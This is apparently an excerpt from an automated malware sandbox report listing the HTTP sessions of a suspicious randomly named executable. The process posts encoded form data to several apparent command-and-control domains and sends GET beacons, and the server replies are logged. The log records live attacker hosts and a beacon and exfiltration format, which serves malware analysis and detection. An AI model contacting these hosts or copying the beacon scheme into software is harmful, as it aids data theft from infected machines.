                                                                                    Jan 9, 2025 16:56:36.223210096 CET834OUTPOST /kgjj/ HTTP/1.1
                                                                                    Host: www.nextlevel.finance
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.nextlevel.finance
                                                                                    Referer: http://www.nextlevel.finance/kgjj/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 55 53 53 68 70 2b 48 78 70 70 66 76 56 56 64 68 74 52 71 34 70 34 70 73 64 6c 54 49 37 54 46 2b 57 6a 50 51 36 5a 33 76 38 39 72 30 7a 58 33 41 59 78 2f 48 59 48 4b 56 66 76 43 38 2f 38 51 4c 74 79 51 30 2b 41 2b 49 2b 41 70 64 70 34 32 31 44 48 6d 59 77 2f 61 6a 66 4c 62 6d 6f 2f 76 41 2f 2b 74 78 75 5a 38 42 74 53 5a 61 30 50 46 75 45 39 47 6a 6d 4f 77 42 45 6e 2f 31 53 37 75 39 30 34 76 67 4d 6b 36 44 36 2b 38 6e 52 6b 2b 6f 4d 4f 52 2f 65 41 73 47 78 72 63 42 76 37 56 54 69 71 35 4c 44 43 41 32 38 6b 34 53 4a 66 6f 2f 2f 32 36 73 72 68 51 59 5a 55 51 61 73 72 5a 39 55 6a 79 6a 30 66 71 41 68 61 30 3d
                                                                                    Data Ascii: 6B-l7F=r2nTWKLo591VUSShp+HxppfvVVdhtRq4p4psdlTI7TF+WjPQ6Z3v89r0zX3AYx/HYHKVfvC8/8QLtyQ0+A+I+Apdp421DHmYw/ajfLbmo/vA/+txuZ8BtSZa0PFuE9GjmOwBEn/1S7u904vgMk6D6+8nRk+oMOR/eAsGxrcBv7VTiq5LDCA28k4SJfo//26srhQYZUQasrZ9Ujyj0fqAha0=
                                                                                    Jan 9, 2025 16:56:36.359236002 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.11.304986313.248.169.48805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:39.909548998 CET1289OUTPOST /kgjj/ HTTP/1.1
                                                                                    Host: www.nextlevel.finance
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.nextlevel.finance
                                                                                    Referer: http://www.nextlevel.finance/kgjj/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 55 53 53 68 70 2b 48 78 70 70 66 76 56 56 64 68 74 52 71 34 70 34 70 73 64 6c 54 49 37 54 64 2b 57 51 33 51 36 34 33 76 36 4e 72 30 77 58 33 46 59 78 2f 2f 59 44 75 52 66 76 65 73 2f 2f 6b 4c 69 30 45 30 37 78 2b 49 6c 51 70 64 32 6f 32 77 4f 6e 6d 33 77 35 36 2f 66 4c 4c 6d 6f 2f 76 41 2f 34 42 78 34 38 41 42 76 53 5a 56 7a 50 46 79 4f 64 47 50 6d 4b 6b 33 45 6e 71 49 53 35 4f 39 30 4a 2f 67 4c 58 53 44 36 2b 38 6e 4c 30 2b 72 4d 4f 56 79 65 41 6b 53 78 75 70 2b 76 4c 78 54 68 50 6f 4f 57 79 46 73 76 6b 6f 50 4f 4d 6b 33 72 58 43 50 6a 44 51 67 49 6e 49 44 69 71 5a 58 64 48 71 71 70 61 75 44 30 2f 46 47 6b 44 43 51 4f 71 78 61 42 6e 52 47 75 6f 42 4b 67 69 64 54 75 4a 79 4b 54 53 64 33 43 54 79 30 4d 73 46 72 48 67 6a 62 53 70 71 42 2b 76 2f 44 61 66 45 4f 7a 4a 66 67 64 71 2f 6e 75 41 63 57 57 4c 71 4f 4c 44 6c 34 65 74 74 78 79 39 56 45 78 43 6a 37 6c 32 31 36 6c 46 6c 45 75 37 55 44 4d 61 4d 64 76 38 55 36 4a 31 4a 67 69 41 30 47 47 48 47 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=r2nTWKLo591VUSShp+HxppfvVVdhtRq4p4psdlTI7Td+WQ3Q643v6Nr0wX3FYx//YDuRfves//kLi0E07x+IlQpd2o2wOnm3w56/fLLmo/vA/4Bx48ABvSZVzPFyOdGPmKk3EnqIS5O90J/gLXSD6+8nL0+rMOVyeAkSxup+vLxThPoOWyFsvkoPOMk3rXCPjDQgInIDiqZXdHqqpauD0/FGkDCQOqxaBnRGuoBKgidTuJyKTSd3CTy0MsFrHgjbSpqB+v/DafEOzJfgdq/nuAcWWLqOLDl4ettxy9VExCj7l216lFlEu7UDMaMdv8U6J1JgiA0GGHGjTeB5y7sBe5mKAQfDcfUenvHQc+9CMtcbllYgWP1wTD5lytse8FVD0rBi1wDW4wzQ6BwVTuzQGijR5oxgMe9rkuLdmBnzGI8nuoYgdU0ea1R6WSfqbl/h87qnw/eB/kgwRzI5geK/eBwKKrArH9dmIo+ycpD5kH1rZcz2FqrpF6Lb/1UNs/RTtfkgOiDUrr+xw5bGv6IhGCqM3njAUJOHnpxp3fHrQFsF9k8mYMyIMW12UG/GcQh9SoHo4EP8LNa1y8ou0b/0nVzsd3PB3op6CQTUxQk4I9mqCqaoEYotDHDCLsLGiTgtkftsiu25K0jTz4u6ccQFMJtiuhHo/V
                                                                                    Jan 9, 2025 16:56:39.909611940 CET2662OUTData Raw: 32 38 6a 6e 45 61 42 6b 32 79 68 70 55 71 43 33 55 30 67 46 41 7a 44 63 64 5a 53 38 7a 6d 78 78 44 55 58 63 48 2f 4d 41 44 77 57 77 6f 62 4f 49 34 62 75 76 43 32 5a 63 49 52 50 6d 50 67 38 56 70 4c 70 45 36 45 76 79 2f 66 50 4d 55 70 4d 4e 38 6f
                                                                                    Data Ascii: 28jnEaBk2yhpUqC3U0gFAzDcdZS8zmxxDUXcH/MADwWwobOI4buvC2ZcIRPmPg8VpLpE6Evy/fPMUpMN8oIyeFzKD1TgXrX+qW/kimRl5HqP97EOCSdA8C5BWNq3BdDJ+an3ckGMubn4hXwHVbhpvHfa3SLZEOjwm8mK3d8e7ZVwC8Rous/lYeskzyOLrdJ1mWvsvlFOWmQ1V/KbbkLAxsP+sOD5uLKAVbd0++VOSyBjvTVpH3Q
                                                                                    Jan 9, 2025 16:56:40.046780109 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.11.304986413.248.169.48805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:42.578635931 CET540OUTGET /kgjj/?6B-l7F=m0PzV+DL9MdhQie9ia/fmr3XBWpQsDf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZafkuM6Gl/4SxdxZjgo=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.nextlevel.finance
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:56:42.719249010 CET379INHTTP/1.1 200 OK
                                                                                    content-type: text/html
                                                                                    date: Thu, 09 Jan 2025 15:56:42 GMT
                                                                                    content-length: 258
                                                                                    connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 42 2d 6c 37 46 3d 6d 30 50 7a 56 2b 44 4c 39 4d 64 68 51 69 65 39 69 61 2f 66 6d 72 33 58 42 57 70 51 73 44 66 2f 6c 6f 74 59 55 58 2b 41 68 6a 4d 6f 51 41 37 46 33 4b 33 46 6a 50 76 38 6b 56 2f 51 42 77 2f 50 64 55 2f 4f 58 4d 2f 72 69 2f 49 62 72 46 59 47 34 78 79 70 69 41 42 77 6e 61 53 57 52 45 47 55 33 75 75 37 5a 61 66 6b 75 4d 36 47 6c 2f 34 53 78 64 78 5a 6a 67 6f 3d 26 38 30 6b 3d 6c 52 61 70 43 50 4d 58 67 44 6b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6B-l7F=m0PzV+DL9MdhQie9ia/fmr3XBWpQsDf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZafkuM6Gl/4SxdxZjgo=&80k=lRapCPMXgDk"}</script></head></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.11.3049865103.106.67.112805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:48.182256937 CET799OUTPOST /k29t/ HTTP/1.1
                                                                                    Host: www.furrcali.xyz
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.furrcali.xyz
                                                                                    Referer: http://www.furrcali.xyz/k29t/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 31 75 48 2f 38 50 70 72 50 6b 36 49 7a 6c 42 37 32 78 71 35 53 7a 70 78 31 6b 42 31 4e 75 58 58 52 42 49 7a 78 64 52 31 38 77 6d 67 6a 57 45 48 75 36 4d 73 4f 5a 43 39 6c 41 34 5a 67 56 39 56 31 58 6f 36 52 54 36 54 54 2f 58 51 5a 43 4d 62 2b 2b 41 71 67 50 4e 59 30 75 76 41 41 6f 65 52 75 54 4c 63 50 54 2b 38 61 77 44 4f 63 52 78 59 69 6d 44 54 47 43 6d 77 4a 4e 79 52 53 6a 45 6b 36 78 4f 66 35 44 73 72 6e 6e 79 6a 75 59 4d 36 6f 36 7a 6e 38 78 33 43 4d 4d 30 33 58 34 39 61 5a 43 78 4a 51 52 35 35 5a 66 33 56 66 65 56 74 69 50 65 2f 51 3d 3d
                                                                                    Data Ascii: 6B-l7F=rJkYOGdVVG3na1uH/8PprPk6IzlB72xq5Szpx1kB1NuXXRBIzxdR18wmgjWEHu6MsOZC9lA4ZgV9V1Xo6RT6TT/XQZCMb++AqgPNY0uvAAoeRuTLcPT+8awDOcRxYimDTGCmwJNyRSjEk6xOf5DsrnnyjuYM6o6zn8x3CMM03X49aZCxJQR55Zf3VfeVtiPe/Q==
                                                                                    Jan 9, 2025 16:56:48.438275099 CET242INHTTP/1.1 302 Found
                                                                                    Location: https://www.furrcali.xyz/k29t/
                                                                                    Server: Dynamic Http Server
                                                                                    X-Ratelimit-Limit: 101
                                                                                    X-Ratelimit-Remaining: 100
                                                                                    X-Ratelimit-Reset: 1
                                                                                    Date: Thu, 09 Jan 2025 15:56:48 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.11.3049867103.106.67.112805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:50.896884918 CET819OUTPOST /k29t/ HTTP/1.1
                                                                                    Host: www.furrcali.xyz
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.furrcali.xyz
                                                                                    Referer: http://www.furrcali.xyz/k29t/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 52 53 48 7a 2f 58 70 75 76 6b 35 52 44 6c 42 79 57 78 75 35 53 2f 70 78 30 51 52 31 37 57 58 58 77 78 49 79 77 64 52 67 38 77 6d 30 7a 58 76 59 2b 36 44 73 4f 56 6b 39 6c 4d 34 5a 67 78 39 56 30 6e 6f 36 69 37 35 51 6a 2f 52 64 35 43 4f 52 65 2b 41 71 67 50 4e 59 30 36 46 41 41 41 65 53 64 37 4c 66 75 54 39 32 36 77 41 48 38 52 78 4b 53 6d 50 54 47 43 59 77 4e 46 63 52 51 72 45 6b 2b 31 4f 66 73 2f 72 77 33 6e 6f 74 4f 5a 6a 2f 70 71 35 6f 49 42 6b 53 64 73 2f 76 32 77 31 66 4f 76 72 55 54 6c 37 71 35 6a 61 4a 65 7a 39 76 67 4f 46 69 56 73 5a 34 7a 58 73 66 58 77 4a 76 4d 62 6b 63 6a 47 69 4b 5a 6b 3d
                                                                                    Data Ascii: 6B-l7F=rJkYOGdVVG3naRSHz/Xpuvk5RDlByWxu5S/px0QR17WXXwxIywdRg8wm0zXvY+6DsOVk9lM4Zgx9V0no6i75Qj/Rd5CORe+AqgPNY06FAAAeSd7LfuT926wAH8RxKSmPTGCYwNFcRQrEk+1Ofs/rw3notOZj/pq5oIBkSds/v2w1fOvrUTl7q5jaJez9vgOFiVsZ4zXsfXwJvMbkcjGiKZk=
                                                                                    Jan 9, 2025 16:56:51.152040005 CET242INHTTP/1.1 302 Found
                                                                                    Location: https://www.furrcali.xyz/k29t/
                                                                                    Server: Dynamic Http Server
                                                                                    X-Ratelimit-Limit: 101
                                                                                    X-Ratelimit-Remaining: 100
                                                                                    X-Ratelimit-Reset: 1
                                                                                    Date: Thu, 09 Jan 2025 15:56:51 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    43192.168.11.3049868103.106.67.112805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:53.626156092 CET3936OUTPOST /k29t/ HTTP/1.1
                                                                                    Host: www.furrcali.xyz
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.furrcali.xyz
                                                                                    Referer: http://www.furrcali.xyz/k29t/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 52 53 48 7a 2f 58 70 75 76 6b 35 52 44 6c 42 79 57 78 75 35 53 2f 70 78 30 51 52 31 37 65 58 57 47 46 49 79 58 4a 52 6d 4d 77 6d 33 7a 57 49 59 2b 36 61 73 4b 35 67 39 6c 52 4e 5a 69 35 39 55 57 76 6f 72 6a 37 35 48 54 2f 52 42 4a 43 4c 62 2b 2b 52 71 6b 54 42 59 30 71 46 41 41 41 65 53 62 48 4c 4a 50 54 39 77 36 77 44 4f 63 52 39 59 69 6d 72 54 47 61 58 77 4e 42 69 52 54 4c 45 6b 4a 70 4f 66 65 58 72 77 33 6e 6f 67 75 5a 6d 2f 70 6d 36 6f 49 35 77 53 63 55 76 76 6e 55 31 66 71 65 4e 49 68 31 65 32 4b 62 42 55 4d 4c 35 6e 44 6a 62 6d 32 70 38 33 43 61 53 57 69 4a 70 71 71 54 73 4c 69 4b 33 51 4d 36 4f 38 4b 4c 6a 61 32 39 73 32 31 43 4e 6e 46 5a 68 48 70 71 31 61 50 65 7a 76 64 52 42 78 41 72 30 71 55 59 2b 6f 4c 59 2f 65 77 42 58 53 65 2b 52 44 76 4b 72 57 46 5a 48 7a 76 41 51 6a 6e 58 52 7a 43 43 75 46 4a 72 7a 53 74 5a 31 56 4e 4a 6b 54 6a 57 66 37 47 64 59 45 6a 7a 49 37 45 37 4c 50 38 36 77 2b 33 73 56 54 44 45 41 4b 51 59 61 69 43 34 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=rJkYOGdVVG3naRSHz/Xpuvk5RDlByWxu5S/px0QR17eXWGFIyXJRmMwm3zWIY+6asK5g9lRNZi59UWvorj75HT/RBJCLb++RqkTBY0qFAAAeSbHLJPT9w6wDOcR9YimrTGaXwNBiRTLEkJpOfeXrw3noguZm/pm6oI5wScUvvnU1fqeNIh1e2KbBUML5nDjbm2p83CaSWiJpqqTsLiK3QM6O8KLja29s21CNnFZhHpq1aPezvdRBxAr0qUY+oLY/ewBXSe+RDvKrWFZHzvAQjnXRzCCuFJrzStZ1VNJkTjWf7GdYEjzI7E7LP86w+3sVTDEAKQYaiC4Tq6tZBivBZTrbmeBQm+gGpBzQ90RiPNSGDKRIqZ+cnqk2+48geDSjwNK+jIvyJj7xoaoiOO5dz01+c2UOAJN4u9jLiCYhbEzzv26+jaJIjg25wTBRpW3eDSQdU+bxeGwQXg/mob9WxtKoGg5AoIGpJHER5YvOYlqs9OZj2IT+YJL1JukeMT7OLrwBZ294GWeGyYqLqBw4FPGFQZxaWM7iWoBdD9YDy0ei6L+NmG02NByHHO/wpNn5tK7qdZfUBLqIBYMbg1u9npEyyNfrtxB7GZHiw+o2ejAY8NkL0Ay9V+QxvpBcZO+JGWu/qze3TjY61mSNPkc7VVqZuvml/LjcqP/F0IiYMaKiMLm+3Vxunog62rDhNY+qzlJkC6F+m4ioWM2wNHetO1fqYOELHpnCSPMxd78TN/AMqbkufo2Dk/hbZQ0kIF2O50ITPKH73XSPI/NVKSEp4oY/1ZHBpZq8bA38WtQpD996DxnUbZmOh5lb5dEiaYt9SE/R+SXrQ6G/R/XUl7SrVSELo488QdaI9IKSXjY/3oJSFpjCf811S8tZx7OVlUnC9jr9eqc7DdxsBF8SwO/SwKhNdf0XNHPsildTg+Y/s8DicVJBC/zqQWVcA2YHkYElrDoLXjIVij5zEzzciNV46ifhp8kuKEZIWNtf+I2A0ddEe [TRUNCATED]
                                                                                    Jan 9, 2025 16:56:53.880795956 CET242INHTTP/1.1 302 Found
                                                                                    Location: https://www.furrcali.xyz/k29t/
                                                                                    Server: Dynamic Http Server
                                                                                    X-Ratelimit-Limit: 101
                                                                                    X-Ratelimit-Remaining: 100
                                                                                    X-Ratelimit-Reset: 1
                                                                                    Date: Thu, 09 Jan 2025 15:56:53 GMT
                                                                                    Content-Length: 0
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    44192.168.11.3049869103.106.67.112805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:56:56.329521894 CET535OUTGET /k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaXyxOjElLsGmAN2m/Z8=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.furrcali.xyz
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:56:56.584871054 CET629INHTTP/1.1 302 Found
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Location: https://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaXyxOjElLsGmAN2m/Z8=&80k=lRapCPMXgDk
                                                                                    Server: Dynamic Http Server
                                                                                    X-Ratelimit-Limit: 101
                                                                                    X-Ratelimit-Remaining: 100
                                                                                    X-Ratelimit-Reset: 1
                                                                                    Date: Thu, 09 Jan 2025 15:56:56 GMT
                                                                                    Content-Length: 201
                                                                                    Connection: close
                                                                                    Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 75 72 72 63 61 6c 69 2e 78 79 7a 2f 6b 32 39 74 2f 3f 36 42 2d 6c 37 46 3d 6d 4c 4d 34 4e 79 56 33 52 6d 37 4c 53 46 36 78 2f 61 33 76 70 73 30 75 52 55 56 37 7a 45 6b 66 6c 43 2f 63 77 58 39 58 78 39 65 44 51 42 4a 37 2f 67 4e 74 35 39 63 75 6a 67 4c 57 47 65 79 67 70 64 73 48 75 48 51 36 5a 54 31 6e 5a 45 65 45 36 41 7a 71 50 44 44 4d 52 6f 36 58 47 70 75 44 31 58 48 69 61 58 79 78 4f 6a 45 6c 4c 73 47 6d 41 4e 32 6d 2f 5a 38 3d 26 61 6d 70 3b 38 30 6b 3d 6c 52 61 70 43 50 4d 58 67 44 6b 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                    Data Ascii: <a href="https://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaXyxOjElLsGmAN2m/Z8=&amp;80k=lRapCPMXgDk">Found</a>.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    45192.168.11.3049870104.21.32.1805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:57:01.860265017 CET811OUTPOST /w98i/ HTTP/1.1
                                                                                    Host: www.buyspeechst.shop
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.buyspeechst.shop
                                                                                    Referer: http://www.buyspeechst.shop/w98i/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 72 52 6d 59 52 45 66 59 6a 55 34 4b 30 33 6e 2f 39 76 62 66 43 6a 35 71 49 6a 4b 6c 4f 46 31 62 7a 75 55 74 67 39 42 7a 7a 46 6b 30 49 7a 48 6b 6b 4f 45 4e 4d 70 2f 31 37 4b 58 4f 42 35 69 65 52 35 51 52 43 32 4a 75 6e 75 37 6e 4c 6f 37 50 67 66 38 64 38 30 73 79 6e 72 61 52 65 2f 49 67 47 64 6b 67 75 57 4c 38 38 71 57 62 70 31 56 4a 70 62 6d 43 43 75 6c 58 6d 6f 6e 48 68 41 63 49 51 53 30 74 32 42 4a 4f 77 6a 56 74 43 50 72 6b 4d 35 64 4a 36 37 4a 2f 2f 74 77 30 39 58 63 72 53 54 2b 75 4a 47 5a 71 76 48 61 35 7a 75 33 38 6c 6d 70 77 77 3d 3d
                                                                                    Data Ascii: 6B-l7F=ZdYnZ6+WLY4YYrRmYREfYjU4K03n/9vbfCj5qIjKlOF1bzuUtg9BzzFk0IzHkkOENMp/17KXOB5ieR5QRC2Junu7nLo7Pgf8d80synraRe/IgGdkguWL88qWbp1VJpbmCCulXmonHhAcIQS0t2BJOwjVtCPrkM5dJ67J//tw09XcrST+uJGZqvHa5zu38lmpww==
                                                                                    Jan 9, 2025 16:57:02.222666979 CET1048INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:57:02 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ro8%2BRdHQnVliNe7E5davoxQTs2cygGkkW9VFtFoOHfMhs8cUYRTOd2FRiLEzR2vOuZFGqLFUprke5iUZuh8pBPwTtJ1JkCtkeZiTDPAal%2FREEjgyvJMsdBNw2BT1GGSyxwzbUJUyWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59ee708b262d6-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=119019&min_rtt=119019&rtt_var=59509&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a
                                                                                    Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
